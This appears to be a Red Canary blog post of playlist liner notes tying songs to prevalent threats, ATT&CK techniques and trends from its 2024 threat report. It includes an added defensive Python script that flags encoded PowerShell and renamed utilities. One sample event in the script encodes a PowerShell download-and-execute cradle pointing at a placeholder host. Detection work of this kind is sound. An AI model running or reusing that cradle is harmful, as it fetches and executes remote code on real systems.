Liner notes

Threat sounds vol. 4: The 2024 Threat Detection Report playlist

We’re excited to press play on Threat sounds vol. 4, a playlist to accompany the 2024 Threat Detection Report. For the fourth year in a row, we picked a song for each of the most prevalent threats, trends, and ATT&CK® techniques Red Canary observed this past year. Read our liner notes below, and listen to all the songs on Spotify!

Side 1: Threats

1. Charcoal Stork

“Stork Bite” by Andy Thorn

Our most prevalent threat of the year is more notable for its sheer numbers than any novel capabilities, but this suspected pay-per-installer can certainly drop some biting payloads.

2. Impacket

“You Need to Calm Down” by Taylor Swift

Ranking second for the second year in a row, the Impacket library of Python classes showed no signs of calming down in 2023, with significant changes made to its code repository.

3. Mimikatz

“Cat’s in the Cradle” by Harry Chapin

When Mimikatz is in the cradle, no set of credentials is safe.

4. Yellow Cockatoo

“good 4 u” by Olivia Rodrigo

Named by Red Canary in 2020, Yellow Cockatoo looked a little too happy and healthy in 2023, cracking our monthly top 10 six times.

5. SocGholish

“Java Jive” by The Ink Spots

SocGholish loves the java jive: malicious JavaScript in its drive-by downloads, to be exact.

6. ChromeLoader

“Fancy Footwork” by Chromeo

Like the members of Chromeo, ChromeLoader and its suspected delivery affiliate Charcoal Stork make for a dynamic duo.

7. Gamarue 

“Birds Vs Worms” by Modest Mouse

Since Gamarue has been around for so long, we went with this appropriately titled Modest Mouse deep cut.

8. Qbot

“Linger” by The Cranberries

Last summer’s much-hyped Qbot takedown appeared to only last for a few weeks. Do you have to let it linger, Qbot affiliates? Do you have to?

9. Raspberry Robin

“Rockin’ Robin” by Bobby Day

As Raspberry Robin is often spread via USB drives, here’s an oldie for the boomers who still use those.

10. SmashJacker

“All Star” by Smash Mouth

SomeBODY once told us our browser was gonna roll us, unless we adopt better allowlist policies.

Side 2: Techniques

 

1. PowerShell (T1059.001)

“My Power” by Beyoncé and friends

Only Queen Bey is powerful enough to represent our most prevalent ATT&CK technique of the year, commanding some featured artists as well.

2. Windows Command Shell (T1059.003)

“Shell Shocked” by Juicy J, Wiz Khalifa, Ty Dolla $ign and others

This song from the “Teenage Mutant Ninja Turtles” soundtrack evokes how defenders can get “Shell Shocked” after discovering malicious use of cmd.exe.

3. Windows Management Instrumentation (T1047)

“Side to Side” by Ariana Grande

Given the lateral movement it enables, Windows Management Instrumentation (WMI) has got us walking side to side.

4. Cloud Accounts (T1078.004)

“Cloudbursting” by Kate Bush

Adversaries burst into cloud environments with valid cloud accounts, often with the help of short-term tokens or API keys, and create highly permissioned accounts on a whim once they’re in.

5. Obfuscated Files or Information (T1027)

“Hide and Seek” by Imogen Heap

Mmm whatcha say? Adversaries hide malicious code from signature-based detection tools with Base64 encoding, string concatenation, and other forms of obfuscation.

6. Email Forwarding Rule (T1114.003)

“emails I can’t send” by Sabrina Carpenter

Turns out Sabrina can’t send these emails because an inbox rule has moved them to the RSS Subscriptions folder.

7. OS Credential Dumping (T1003)

“Song for the Dumped” by Ben Folds Five

It’s not you, it’s Mimikatz.

8. Rundll32 (T1218.011) 

“Born to Run” by Bruce Springsteen

Sprung from cages in System32—DLLs like us, baby we were born to run.

9. Ingress Tool Transfer (T1105)

“Transfer Affection” by A Flock of Seagulls

What can we say, we have a thing for bands with bird names.

10. Rename System Utilities (T1036.003) 

“What’s My Name?” by Rihanna, featuring Drake

We can imagine adversaries humming this when deciding what to rename the system utilities they’re abusing. RiRi.exe would probably not blend in very well.
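Two of the techniques on this side lend themselves to a quick check. As an added example (not Red Canary’s code, and not part of the report itself), the script below runs over a handful of constructed process-creation events and flags both a Base64-encoded PowerShell command line (T1027), decoding it to show what a signature-based tool sees past, and a process whose on-disk name differs from the OriginalFileName embedded in a well-known system utility (T1036.003). The field names, the utility list, and the sample events are all assumptions made for the example.

```python
import base64
import re

# Image names of commonly abused Windows utilities (an illustrative list, not
# an exhaustive one), compared case-insensitively against the PE OriginalFileName.
SYSTEM_UTILITIES = {
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "msiexec.exe",
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
}

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -enc, ...)
# and the commonly seen -ec; treating every prefix as valid is a deliberate
# over-approximation for detection purposes (assumption, not a PowerShell spec).
_ENC_PREFIXES = "|".join(
    re.escape("encodedcommand"[:n]) for n in range(1, len("encodedcommand") + 1)
) + "|ec"
ENC_FLAG = re.compile(rf"(?i)(?:^|\s)-(?:{_ENC_PREFIXES})\s+([A-Za-z0-9+/=]+)")


def encode_command(script):
    """Build a -EncodedCommand argument the way an adversary would (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line):
    """T1027: return the plaintext of a Base64-encoded PowerShell command line, or None."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid Base64, or not UTF-16LE (odd length or malformed data).
        return None


def is_renamed_utility(event):
    """T1036.003: the on-disk name differs from the embedded OriginalFileName of a known utility."""
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    original = event["original_file_name"].lower()
    return original in SYSTEM_UTILITIES and image_name != original


def analyze(events):
    """Return (technique, image, detail) findings for a list of process-creation events."""
    findings = []
    for event in events:
        decoded = decode_encoded_command(event["command_line"])
        if decoded is not None:
            findings.append(("T1027", event["image"], decoded))
        if is_renamed_utility(event):
            findings.append(("T1036.003", event["image"], event["original_file_name"]))
    return findings


# Constructed sample events (not real telemetry) with the fields a Sysmon
# Event ID 1 record carries: Image, OriginalFileName and CommandLine.
SAMPLE_EVENTS = [
    {
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "original_file_name": "PowerShell.EXE",
        "command_line": "powershell.exe -nop -w hidden -enc "
        + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    },
    {
        "image": r"C:\Users\Public\RiRi.exe",   # rundll32.exe renamed, per the liner note
        "original_file_name": "RUNDLL32.EXE",
        "command_line": r"RiRi.exe C:\Users\Public\x.dll,Start",
    },
    {
        "image": r"C:\Windows\System32\cmd.exe",  # benign: name matches OriginalFileName
        "original_file_name": "Cmd.Exe",
        "command_line": "cmd.exe /c whoami",
    },
]

if __name__ == "__main__":
    for technique, image, detail in analyze(SAMPLE_EVENTS):
        print(f"{technique}\t{image}\t{detail}")
```

On real endpoints the OriginalFileName comes from the PE version resource, which Sysmon and most EDR sensors record at process creation; the comparison only works when that field is populated, so treat a missing value as unknown rather than benign.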

Featured: Installer Packages (T1546.016)

“The Grand Parade of Lifeless Packaging” by Genesis

While they might appear lifeless, MSIX packages are prime delivery vehicles for malicious fake installers.

Featured: Kernel Modules and Extensions (T1547.006)

“Everybody Hates Linux” by Linux

We don’t hate Linux, not at all! But we understand the frustration around trying to secure the kernel might lead you to say so.

Featured: Escape to Host (T1611)

“The Sweet Escape” by Gwen Stefani and Akon

Escaping from a Linux container to its host must be quite a rush, enough for us to let out a Millennial whoop with Akon.

Featured: Reflective Code Loading (T1620)

“Mirrors” by Justin Timberlake

Adversaries leverage reflective code loading to avoid writing their payload to disk (or so they believe), evading defensive controls the way Justin Timberlake avoids Britney Spears fans.

Featured: AppleScript (T1059.002)

“Unwritten” by Natasha Bedingfield

Just like MTV’s “reality” show “The Hills,” much adversary activity on macOS is scripted. The rest? Still unwritten.

Bonus tracks: Trends

 

Ransomware

“Criminal” by Fiona Apple

What you need is a good defense: against ransomware precursors, that is.

Initial access tradecraft

“Wolfman’s Brother” by Phish

Like certain types of multi-factor authentication (MFA), the editors of this report are known to be Phish-resistant. But this year we relented after discovering a Phish song under five minutes long.

Identity attacks

“It Wasn’t Me” by Shaggy, featuring Rik Rok

If you spot nefarious activity coming from one of your employees’ accounts, rule out an identity compromise before pointing fingers. Their denials are likely more credible than Shaggy’s.

Vulnerabilities 

“I Like to Move It” by Reel 2 Real

While new CVEs like the MOVEit zero-day made headlines, adversaries exploited plenty of years-old (maybe less catchy) vulnerabilities throughout 2023 as well.

Stealers 

“Jolene” by Dolly Parton

RedLine, RedLine, RedLiiiine: We’re begging you to not take our creds.

Remote monitoring and management (RMM) tools

“Scattered” by Green Day

No adversary made better use of remote monitoring and management (RMM) tools in 2023 than SCATTERED SPIDER; we hope to say Good Riddance to them in 2024.

API abuse in the cloud 

“Just a Cloud Away” by Pharrell Williams

Once they access the API, adversaries are just a cloud away from your organization’s crown jewels.

Artificial intelligence (AI)

“Now and Then” by The Beatles

Among the things we have artificial intelligence (AI) to thank for in 2023: The release of a long lost Beatles song, new detection and response technologies, and a steady drip of existential dread.

Adversary emulation and testing 

“Testing 1, 2, 3” by Barenaked Ladies

Long live ART. Long live BNL.

Industry and sector analysis 

“INDUSTRY BABY” by Lil Nas X featuring Jack Harlow

Does Lil Nas X make country music? Rap? Pop for the terminally online? We faced similar dilemmas when trying to accurately categorize our customers in our industry analysis.

 
 